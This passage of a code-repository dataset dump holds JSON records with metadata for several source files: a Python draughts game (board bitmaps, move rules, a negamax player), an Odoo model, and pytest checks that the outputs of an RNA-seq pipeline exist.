wx.App()\n\nform = MainForm(b, r)\nform.Show()\n\napp.MainLoop()\n"
},
{
"alpha_fraction": 0.40902256965637207,
"alphanum_fraction": 0.4195488691329956,
"avg_line_length": 27.18644142150879,
"blob_id": "f0f5e7e06d1d3f126ca2350f49a910209215db3e",
"content_id": "25b5565e0b6ad919236b25ec2a9d867d8ec68f6d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3325,
"license_type": "no_license",
"max_line_length": 125,
"num_lines": 118,
"path": "/game_board.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import re\n\n_n = 8 # sqrt(_N*2) board size _n * _n\n_N = _n * _n // 2 # number of fields on the board ('dots')\n_mask = [1 << x for x in range(0, _N)] # bit mask of each dot in the board\n\n\ndef dot_index(_col, _row):\n return (_row * _n + _col) // 2\n\n\nclass Board:\n __slots__ = ['full','black','dam']\n\n def __init__(self):\n self.full = 0 # bitmap: bit[i] == 1 - a dot not empty, i = 0 .. _N -1\n self.black = 0 # bitmap: bit[i] == 1 - a dot is black\n self.dam = 0 # bitmap: bit[i] == 1 - a dot is dam\n\n # return dot symbol at specified position \".\" - empty, o - white, O - white dam, x - black, X - black dam\n def dot(self, n):\n mask = _mask[n]\n if self.full & mask == 0:\n return '.'\n else:\n is_dam = self.dam & mask != 0\n is_black = self.black & mask != 0\n if is_dam:\n return 'X' if is_black else 'O'\n else:\n return 'x' if is_black else 'o'\n\n # board as human readable string\n def __str__(self):\n res = ''\n for r in range(0, _n):\n res += '\\n'\n for c in range(0, _n):\n if (r + c) % 2 == 1:\n n = dot_index(c, r)\n res += self.dot(n)\n else:\n res += ' '\n #res += '\\nfull '+format(self.full, 'b') +'\\ndam '+format(self.dam, 'b') + '\\nblack '+format(self.black, 'b')+'\\n'\n return res\n \n def initial(self):\n self.clear()\n x = (_N - _n) // 2\n for i in range(0, x):\n b_mask = _mask[i]\n w_mask = _mask[_N - i - 1]\n self.black |= b_mask\n self.full |= b_mask | w_mask\n\n def load(self, text):\n st = re.sub(r'[^xXoO.]', \"\", text)\n self.clear()\n assert(len(st) == _N)\n for i in range(0, len(st)):\n if st[i] != '.':\n mask = _mask[i]\n self.full |= mask\n if st[i] == 'O' or st[i] == 'X':\n self.dam |= mask\n if st[i] == 'X' or st[i] == 'x':\n self.black |= mask \n\n def is_dam(self, n):\n return self.dam & _mask[n] != 0\n \n def is_black(self, n):\n return self.black & _mask[n] != 0\n\n def empty(self, n):\n return self.full & _mask[n] == 0 \n\n def clear(self):\n self.full = 0\n self.dam = 0\n self.black = 0\n\n def set(self, n, _white, _dam):\n m = _mask[n] \n self.full |= m\n if _white:\n self.black &= ~m\n else:\n self.black |= m\n if _dam:\n self.dam |= m\n else:\n self.dam &= ~m\n \n def set_empty(self, n):\n self.full &= ~_mask[n]\n\n def owned_by(self, white_player, n):\n m = _mask[n]\n if self.full & m == 0:\n return False\n if white_player:\n return self.black & m == 0\n else:\n return self.black & m != 0\n\n # side - white == True or black == False\n def units(self, side):\n for i in range(0, _N):\n if self.owned_by(side, i):\n yield i\n\n def clone(self):\n b = Board()\n b.full = self.full\n b.dam = self.dam\n b.black = self.black\n return b"
},
{
"alpha_fraction": 0.4587581157684326,
"alphanum_fraction": 0.47358664870262146,
"avg_line_length": 32.37113571166992,
"blob_id": "e4027610e474c6de709e193a1f4b9c897b40cf87",
"content_id": "4930a364902a0f763f5c2227902714517c6cfe18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6474,
"license_type": "no_license",
"max_line_length": 115,
"num_lines": 194,
"path": "/game_rules.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "_backward = [0, 1]\n_forward = [2, 3]\n_all_directions = [0, 1, 2, 3]\n_vector = [[-1, 1], [1, 1], [-1, -1], [1, -1]]\n\n\nclass BoardGeometry:\n def __init__(self, size):\n self.d = size // 2\n self.D = size\n assert(size >= 4)\n assert(size % 2 == 0)\n \n def fields(self):\n return self.D * self.D // 2\n\n def col_index(self, n):\n return n % self.d\n\n def row(self, n):\n return n // self.d\n\n def col(self, n):\n return self.col_index(n) * 2 + 1 - (self.row(n) % 2)\n\n def number(self, _col, _row):\n i = _col // 2\n return _row * self.d + i\n\n def near(self, n, direction):\n c = self.col(n) + _vector[direction][0]\n if 0 <= c < self.D:\n r = self.row(n) + _vector[direction][1]\n if 0 <= r < self.D:\n return self.number(c, r)\n return self.fields()\n \n \ndef _to_str(n):\n return chr(n + 0x30)\n\n\ndef _from_str(ch):\n return ord(ch) - 0x30 \n\n\nclass Rules:\n def __init__(self, board_size):\n g = BoardGeometry(board_size)\n self.fields = g.fields()\n self.way = []\n for i in range(0, g.fields()):\n self.way.append([g.near(i, 0), g.near(i, 1), g.near(i, 2), g.near(i, 3)])\n self.dam_target_white = [i for i in range(0, g.d)]\n self.dam_target_black = [g.d * g.D - i - 1 for i in range(0, g.d)]\n \n def _valid(self, n):\n return n < self.fields\n \n def _dam_field(self, white_turn, n):\n if white_turn:\n return n in self.dam_target_white\n else:\n return n in self.dam_target_black\n \n def _hit(self, board, player, n, direction):\n n1 = self.way[n][direction]\n if self._valid(n1) and board.owned_by(not player, n1):\n n2 = self.way[n1][direction]\n if self._valid(n2) and board.empty(n2):\n return _to_str(n1) + _to_str(n2)\n return None\n\n def _dam_hit(self, board, player, n, direction):\n n1 = self.way[n][direction]\n while self._valid(n1) and board.empty(n1):\n n1 = self.way[n1][direction]\n result = [] \n if self._valid(n1) and board.owned_by(not player, n1):\n n2 = self.way[n1][direction]\n while self._valid(n2) and board.empty(n2):\n result.append(_to_str(n1) + _to_str(n2))\n n2 = self.way[n2][direction]\n return result\n \n def _hit_way(self, board, white_turn, n, way):\n res = {}\n dirs = []\n for d in _all_directions:\n r = self._hit(board, white_turn, n, d)\n if r is not None:\n if r[0] not in way:\n dirs.append(d)\n res[d] = r\n if len(dirs) == 0:\n yield way\n for d in dirs:\n n1 = _from_str(res[d][1])\n way_generator = self._hit_dam_way if self._dam_field(white_turn, n1) else self._hit_way # russian rule\n # way_generator = self._hit_way # international rule\n for a_way in way_generator(board, white_turn, n1, way + res[d]):\n yield a_way\n\n def _hit_dam_way(self, board, white_turn, n, way):\n res = {}\n dirs = []\n for d in _all_directions:\n r = self._dam_hit(board, white_turn, n, d)\n if len(r) > 0:\n if r[0][0] not in way:\n dirs.append(d)\n res[d] = r\n if len(dirs) == 0:\n yield way\n for d in dirs:\n sub_ways = []\n final_ways = []\n for r in res[d]:\n n1 = _from_str(r[1])\n for new_way in self._hit_dam_way(board, white_turn, n1, way + r):\n if len(new_way) == len(way+r):\n final_ways.append(new_way)\n else:\n sub_ways.append(new_way)\n if len(sub_ways) == 0:\n sub_ways = final_ways\n for a_way in sub_ways:\n yield a_way\n \n def hits(self, board, white_turn):\n for i in board.units(white_turn):\n way_gen = self._hit_dam_way if board.is_dam(i) else self._hit_way\n for r in way_gen(board, white_turn, i, \"\"):\n if len(r) > 0:\n yield r + _to_str(i)\n\n def _move(self, board, white_turn, n):\n directions = _forward if white_turn else _backward\n for d in directions:\n x = self.way[n][d]\n if self._valid(x) and board.empty(x):\n yield _to_str(x)\n\n def _dam_move(self, board, white_turn, n):\n for d in _all_directions:\n x = self.way[n][d]\n while self._valid(x) and board.empty(x):\n yield _to_str(x)\n x = self.way[x][d]\n\n def moves(self, board, white_turn):\n for i in board.units(white_turn):\n way_gen = self._dam_move if board.is_dam(i) else self._move\n for dest in way_gen(board, white_turn, i):\n yield dest + _to_str(i)\n\n # input m - [taken_1, move_point_1.. taken_n, move_point_n, move_point_0]\n def apply(self, board, move):\n src = _from_str(move[-1])\n dest = _from_str(move[-2])\n is_dam = board.is_dam(src)\n color = not board.is_black(src)\n assert(not board.empty(src))\n board.set_empty(src)\n is_dam |= self._dam_field(color, dest)\n if len(move) > 2:\n assert((len(move) % 2) == 1)\n for i in range(0, (len(move) - 1) // 2):\n x = _from_str(move[i*2])\n board.set_empty(x) # empty taken units\n # russian dam rules\n y = _from_str(move[i*2+1])\n is_dam |= self._dam_field(color, y)\n board.set(dest, color, is_dam)\n\n def transformed_board(self, board, move):\n b = board.clone()\n self.apply(b, move)\n return b\n\n def play(self, board, white_turn):\n no_hit = True\n for m in self.hits(board, white_turn):\n yield m\n no_hit = False\n if no_hit:\n for m in self.moves(board, white_turn):\n yield m \n \n def move_list(self, board, white_turn):\n move_list = []\n for a_move in self.play(board, white_turn):\n move_list.append(a_move)\n return move_list\n"
},
{
"alpha_fraction": 0.5119418501853943,
"alphanum_fraction": 0.5295950174331665,
"avg_line_length": 23.66666603088379,
"blob_id": "d426f16810540da4845ca8a9e6e271a01461b479",
"content_id": "eba2d193073685d2b8b5d9c34794da3471cfda3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 963,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 39,
"path": "/game_ai_player.py",
"repo_name": "llislex/py_draugth",
"src_encoding": "UTF-8",
"text": "import game_board\n\n\ndef evaluate(_board):\n result = 0\n for i in range(0, game_board._N):\n c = _board.dot(i)\n if c == 'o':\n result += 1\n elif c == 'O':\n result += 3\n elif c == 'x':\n result -= 1\n elif c == 'X':\n result -= 3\n else:\n continue\n return result\n\nmax_value = 100\n\n\ndef is_hit(move):\n return len(move) > 2\n\n\ndef negamax(board, rules, white_turn, depth, alpha, beta):\n if depth == 0:\n return evaluate(board) if white_turn else -evaluate(board)\n result = -max_value\n for m0 in rules.play(board, white_turn):\n b0 = rules.transformed_board(board, m0)\n new_depth = depth if is_hit(m0) else depth - 1\n evaluation = negamax(b0, rules, not white_turn, new_depth, -beta, -alpha)\n result = max(result, -evaluation)\n alpha = max(alpha, result)\n if alpha >= beta:\n break\n return result\n\n"
}
] | 5 |
yasr3mr96/tttt
|
https://github.com/yasr3mr96/tttt
|
a37c49ff5bb6c88f730d066d65654ff567dee2ae
|
2a9a2776364b3801c857cd15d8c6bbb9919df7c6
|
79cf16862a3f1338637ccc103e377bf12355d082
|
refs/heads/master
| 2021-05-21T22:40:30.836792 | 2020-04-03T20:45:04 | 2020-04-03T20:45:04 | 252,836,822 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6063675880432129,
"alphanum_fraction": 0.6150506734848022,
"avg_line_length": 27.79166603088379,
"blob_id": "23ded7f1bf868925a1dc7434b8fcc8991047a4e9",
"content_id": "ca28ac06cac3cab867c5df2c00582197e65b40d0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 691,
"license_type": "no_license",
"max_line_length": 76,
"num_lines": 24,
"path": "/models/models.py",
"repo_name": "yasr3mr96/tttt",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\n\nclass tttt(models.Model):\n _name = 'tttt.tttt'\n\n name = fields.Char()\n value = fields.Integer()\n value2 = fields.Float(compute=\"_value_pc\", store=True)\n description = fields.Text()\n lines = fields.One2many(comodel_name=\"lines\", inverse_name=\"p\")\n\n @api.depends('lines')\n def _value_pc(self):\n for i in self:\n for line in i.lines:\n i.value2 =line.t*5\n\nclass lines(models.Model):\n _name='lines'\n name = fields.Char(string=\"\", required=False)\n t = fields.Float(string=\"\", required=False)\n p = fields.Many2one(comodel_name=\"tttt.tttt\", string=\"\", required=False)\n"
}
] | 1 |
lgdc-ufpa/immunogenetic-applications-in-covid-19
|
https://github.com/lgdc-ufpa/immunogenetic-applications-in-covid-19
|
bc0fc05dcd26cd3254c4e152287dc4341b2daa97
|
0790eaa0f30294a745f360c3f9fcea50d8ed8c96
|
8885a4ae80b5be2a3331b210c195866c08fe74d1
|
refs/heads/master
| 2023-04-02T09:04:56.067668 | 2021-01-18T21:10:03 | 2021-01-18T21:10:03 | 330,265,369 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6495398879051208,
"alphanum_fraction": 0.7239263653755188,
"avg_line_length": 80.5625,
"blob_id": "b453aa257609cea4adea3aaf1ba2a0ad8b6bc06e",
"content_id": "86c3b09c8ce39fed8f08aeb911afc81de76ea1a2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1304,
"license_type": "no_license",
"max_line_length": 832,
"num_lines": 16,
"path": "/sprint2_genes_from_orphanet/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 02: get ensembl links\n---\n**DETAILS:**\nGet each link from ensembl storaged in sprint 01 output (links_genes.html) and put them in a table/csv file to analyse manually.\n---\n<!--[if IE]><meta http-equiv=\"X-UA-Compatible\" content=\"IE=5,IE=9\" ><![endif]-->\n<!-- <!DOCTYPE html> -->\n<html>\n<head>\n<title>pictures</title>\n<meta charset=\"utf-8\"/>\n</head>\n<body><div class=\"mxgraph\" style=\"max-width:100%;border:1px solid transparent;\" data-mxgraph=\"{"nav":true,"resize":true,"toolbar":"zoom layers lightbox","edit":"_blank","xml":"<mxfile host=\\"Electron\\" modified=\\"2021-01-18T15:51:21.775Z\\" agent=\\"5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) draw.io/14.1.8 Chrome/87.0.4280.88 Electron/11.1.1 Safari/537.36\\" etag=\\"OWv65n12ZWU8uEJmnsSG\\" version=\\"14.1.8\\" type=\\"device\\"><diagram id=\\"-ETIXZryIh__wcPm28Kg\\" name=\\"sprint2\\">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</diagram></mxfile>"}\"></div>\n<script type=\"text/javascript\" src=\"https://viewer.diagrams.net/js/viewer-static.min.js\"></script>\n</body>\n</html>"
},
{
"alpha_fraction": 0.5496183037757874,
"alphanum_fraction": 0.694656491279602,
"avg_line_length": 12.149999618530273,
"blob_id": "aa8911b2c639413fb7ab88d0e6ae0685c8de0a10",
"content_id": "bb1ef71f468a89842edbcaf3192b627bb1bd7393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 262,
"license_type": "no_license",
"max_line_length": 34,
"num_lines": 20,
"path": "/requirements.txt",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# others\ntqdm==4.55.1\n\n#data science\nnumpy==1.19.4\npandas==1.2.0\nscipy==1.6.0\n\n# data visualization\nmatplotlib==3.3.3\nseaborn==0.11.1\njupyter==1.0.0\nplotly==4.14.3\n\n# Type Hintings\ntyping==3.7.4.3\n\n# linters and somethings like that\npyflakes==2.2.0\npylint==2.6.0"
},
{
"alpha_fraction": 0.7421875,
"alphanum_fraction": 0.7645089030265808,
"avg_line_length": 46.157894134521484,
"blob_id": "aea1399d1b9d50939c201ced42bffb7662177c12",
"content_id": "b074172021eb857ddf264f5cf5a2b61bece616af",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 896,
"license_type": "no_license",
"max_line_length": 256,
"num_lines": 19,
"path": "/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 01: Obtain genes\n---\n**GOAL:**\nGet the 308 genes from orphanet and retrive manually the html table genes\n# Sprint 02: Generate table of genes\n---\n**GOAL:**\nGenerate a csv table file with links to ensembl, chromossome region, ensembl id for each gene form sprint 01 output (links_genes.html)\n---\n# Sprint 03: analyze in ensembl the genes from table of genes\n---\n**GOAL:**\nAnalyze manually each one of the 308 genes in ensembl storaged in sprint 02 output (gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv). Get pathogenic variants of each gene analyzed in ensembl variant predictor and get population of these variants\n---\n# Sprint 04: data analysis of the genes analysis\n---\n**GOAL:**\nVisualize outputs of the output of the sprint 03 (analysis of the genes) or even obtain metrics from them. It includes essensially analyse the frequency of the variants in the populations\n---\n"
},
{
"alpha_fraction": 0.7531914710998535,
"alphanum_fraction": 0.7957446575164795,
"avg_line_length": 46.20000076293945,
"blob_id": "a96a166aba257fedd48a2c6c0c69347d7a72dcdc",
"content_id": "4023d3ad9829b911fc3f00d09b0fe2abb5080f66",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 235,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 5,
"path": "/sprint1_gene_links/README.md",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "# Sprint 01: gene links from orphanet site\n---\nThe 308 genes are retrieved manually by the following orphanet link\n\nhttps://www.orpha.net/consor/cgi-bin/Disease_Genes_Simple.php?lng=PT&LnkId=14933&Typ=Pat&diseaseType=Gen&from=rightMenu"
},
{
"alpha_fraction": 0.678670346736908,
"alphanum_fraction": 0.6897506713867188,
"avg_line_length": 35.125,
"blob_id": "37e0f459fddf22030a0926ccfd00432007a7bb81",
"content_id": "336d6c131f5a7da857e4323aa7409920ce88e782",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1448,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 40,
"path": "/sprint2_genes_from_orphanet/main.py",
"repo_name": "lgdc-ufpa/immunogenetic-applications-in-covid-19",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nfrom urllib.parse import urljoin\nimport requests\nfrom lxml import etree\nfrom lxml import html\nfrom tqdm import tqdm\n\n\nwith open('gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv', \"w\") as f:\n f.write('Gene>Link orphanet>Link Ensembl>Código no Ensembl>Localização Cromossômica>\\n')\n f.close()\n\n# soup = BeautifulSoup(open(\"links_genes.html\", \"r\"), 'html.parser')\nsoup = BeautifulSoup(open(\"links_genes.html\", \"r\"), 'html.parser')\n\nlist_li = soup.find_all('li')\n\nfor li in tqdm(list_li):\n\tgene_name = li.text\n\t# print(gene_name)\n\t# link_orphanet = li.find('a', href=True).get('href')\n\tbase = \"https://www.orpha.net/consor/cgi-bin/\"\n\tlink_orphanet = urljoin(base, li.find('a')['href'].replace(' ', '%20'))\n\t# print(link_orphanet)\n\n\treq_gene = requests.get(link_orphanet)\n\t# tree = etree.parse(req_gene, etree.HTMLParser())\n\t# tree = html.fromstring(req_gene.content)\n\t# trs = tree.xpath('//*[@id=\"ContentType\"]/div[2]/ul/li[9]')\n\n\tsoup2 = BeautifulSoup(req_gene.text, 'html.parser')\n\tchromossome_region = soup2.find_all('strong')[4].text\n\tommin_link = soup2.find_all('strong')[5]\n\n\tid_ensembl = soup2.find_all('strong')[9].text\n\tlink_ensembl = soup2.find_all('strong')[9].find('a')['href'].replace(' ', '%20')\n\t\n\twith open('gene_link-orphanet_link-ensembl_id-ensembl_chromossome.csv', \"a\") as f:\n\t\tf.write(f'{gene_name}>{link_orphanet}>{link_ensembl}>{id_ensembl}>{chromossome_region}\\n')\n\t\tf.close()"
}
] | 5 |
utsw-bicf/gudmap_rbk.rna-seq
|
https://github.com/utsw-bicf/gudmap_rbk.rna-seq
|
3997a5d014be8882a176e9d1b0337b0c279e4dfc
|
14a1c222e53f59391d96a2a2e1fd4995474c0d15
|
742382c620f1ca03692464601f8853d6b570e665
|
refs/heads/master
| 2023-04-15T03:00:27.416370 | 2021-05-07T04:43:49 | 2021-05-07T04:43:49 | 338,119,727 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7024539709091187,
"alphanum_fraction": 0.7055214643478394,
"avg_line_length": 20.799999237060547,
"blob_id": "4ded822da5b378df1c8fd9a9454bf6e7dd63ecca",
"content_id": "25a9941de634d36b84ad750c5968fa75009dfd27",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 326,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 15,
"path": "/workflow/tests/test_completion.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\nimport json\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\[email protected]\ndef test_multiqcExist(filename):\n assert os.path.exists(os.path.join(\n test_output_path, filename))"
},
{
"alpha_fraction": 0.6366906762123108,
"alphanum_fraction": 0.6582733988761902,
"avg_line_length": 23.173913955688477,
"blob_id": "b71041cb50b58b0206db65bcfd26e8c8260e127e",
"content_id": "a0938e756715fb30254e5c72fee4cd38bffec330",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 556,
"license_type": "permissive",
"max_line_length": 65,
"num_lines": 23,
"path": "/workflow/tests/test_trimData.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nfrom io import StringIO\nimport os\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_trimData_se():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se_trimmed.fq.gz'))\n\n\[email protected]\ndef test_trimData_pe():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.pe_val_1.fq.gz'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.pe_val_2.fq.gz'))\n"
},
{
"alpha_fraction": 0.6395891904830933,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 35.931034088134766,
"blob_id": "849a1be187d17da201e5418bb6131863327cea59",
"content_id": "15e227d4586334721257bc6382d60cf0709bac62",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1071,
"license_type": "permissive",
"max_line_length": 70,
"num_lines": 29,
"path": "/workflow/tests/test_dedupReads.py",
"repo_name": "utsw-bicf/gudmap_rbk.rna-seq",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env python3\n\nimport pytest\nimport pandas as pd\nimport os\nimport utils\n\ntest_output_path = os.path.dirname(os.path.abspath(__file__)) + \\\n '/../../'\n\n\[email protected]\ndef test_dedupData():\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr8.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr8.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr4.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chr4.bam.bai'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chrY.bam'))\n assert os.path.exists(os.path.join(\n test_output_path, 'Q-Y5F6_1M.se.sorted.deduped.chrY.bam.bai'))\n"
},
{
